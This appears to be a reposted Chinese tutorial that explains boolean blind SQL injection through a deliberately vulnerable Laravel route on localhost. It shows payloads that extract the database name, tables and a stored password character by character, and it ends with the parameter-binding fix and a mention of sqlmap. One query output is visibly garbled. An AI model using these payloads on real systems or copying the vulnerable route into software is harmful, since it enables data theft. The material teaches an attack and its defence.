通过laravel漏洞实例解析sql盲注原理

2022-08-01 0 483

本篇文章给大家带来了关于laravel的相关知识,其中主要介绍了怎样通过造一个laravel漏洞来讲解sql盲注原理,所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击,下面一起来看一下,希望对大家有帮助。

通过laravel漏洞实例解析sql盲注原理

【相关推荐:laravel视频教程】

环境

composer create-project laravel/laravel lar9 // 安装laravel9// 编辑.env  修改为DEBUG=false 配置数据库DEBUG=falseDB_HOST=....php artisan migratephp artisan serve // 启动// 插入数据insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');

创建漏洞

// routes/web.phpRoute::get('/', function () { $id = request()->id; $user = \\App\\Models\\User::whereRaw('id = '.$id)->first(); return $user->name ?? '';});// 最后转换的sql是: select * from users where id = $id

测试

http://127.0.0.1:8000/?id=1'// 500http://127.0.0.1:8000/?id=1 and 1=2// select * from users where id = 1 and 1=2; 返回空http://127.0.0.1:8000/?id=1 and 1=1 // select * from users where id = 1 and 1=1 返回xxh

步骤

数据库名

猜出数据名长度

url: http://127.0.0.1:8000/?id=1 and length(database()) = 1select * from users where id = 1 and length(database()) = 1select * from users where id = 1 and length(database()) = 2// 一直循环下去

猜出数据库名

从第一步 知道了数据库名长度`select * from users where id = 1 and substr(database(),1,1) =a` `select * from users where id = 1 and substr(database(),1,1) =b` // 一直循环下去 找到数据库名的第一个做字符  然后找第二个字符  直到找完数据库名的长度

最终: laravel_project

表名

以下的步骤和猜数据库差不多,就简说了。

information_schema

information_schema 是 mysql 自带的,

数据库名 表名 列类型 等都有记录,猜表 字段明需要从这个数据库来。

猜 laravel_project 的表数量

url:   http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct";+----------+| count(*) |+----------+|        5 |+----------+

猜第一个表名的长度

与 [猜出数据名长度] 此不多。

猜第一个表名

url:   http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f'mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1;+------------------------+| substr(table_name,1,1) |+------------------------+| f                      |+------------------------+// 得出第一个表的第一个字段是f  然后查第

最终得出第一个表名称为: failed_jobs

猜字段

和猜表一模一样的逻辑。

select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; //  fail_jobs字段总数

猜数据

数据这才是最重要的。

因为 failed_jobs 没数据,所以我换成 users 来。

users 有个 password 字段。

mysql> select substr((select password from users limit 0,1),1,1);+----------------------------------------------------+| substr((select password from users limit 0,1),1,1) |+----------------------------------------------------+| w                                                  |+----------------------------------------------------+得出第一个是w,存起来,最后判断 mysql> select substr((select password from users limit 0,1),1,2);+----------------------------------------------------+| substr((select password from users limit 0,1),1,2) |+----------------------------------------------------+| wo                                                 |+----------------------------------------------------+第二个值为o用第一个值 + 第二个值作为盲注

……

防御

(有时候 where 不满足需求,就需要 whereRaw)

如果需要,记得绑定就好。

Route::get('/', function () { $id = request()->id; $user = \\App\\Models\\User::whereRaw('id = ?',[$id])->first(); return $user->name ?? '';});

只要安份的用框架,不会会漏洞的。

那些老项目,漏洞满地飞。

现在这个时代,找漏洞难登天。

Ps

上面为了讲解简单,用是最简单的查找。

手工盲注应该用二分查找。

select * from users where id = 1 and  substr(database(),1,1) ='a';换成二分: select * from users where id = 1 and  ascii(substr(database(),1,1)) > 99;

最好还是直接借助工具 sqlmap, 直接扫出来。

【相关推荐:laravel视频教程】

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

【声明:根据2013年1月30日《计算机软件保护条例》2次修订第17条规定: 为了学习和研究软件内含的设计思想和原理,通过安装、显示、传输或者存 储软件等方式使用软件的,可以不经软件著作权人许可,不向其支付报酬! 鉴于此,也希望大家按此说明研究软件!】
本站所有源码尽量保证原汁原味,如有特殊情况会作出声明及标注,网站资源不做任何二次加密(原版加密除外,不影响程序使用的不会做解密处理),方便您更好的学习参考。 在您的能力范围内,为了大环境的良性发展,请尽可能的选择正版资源。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

即刻码站__国内靠谱的站长资源下载平台 php教程 通过laravel漏洞实例解析sql盲注原理 https://www.jike1995.com/38301.html

常见问题
  • 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用
查看详情
  • 最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度
查看详情

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务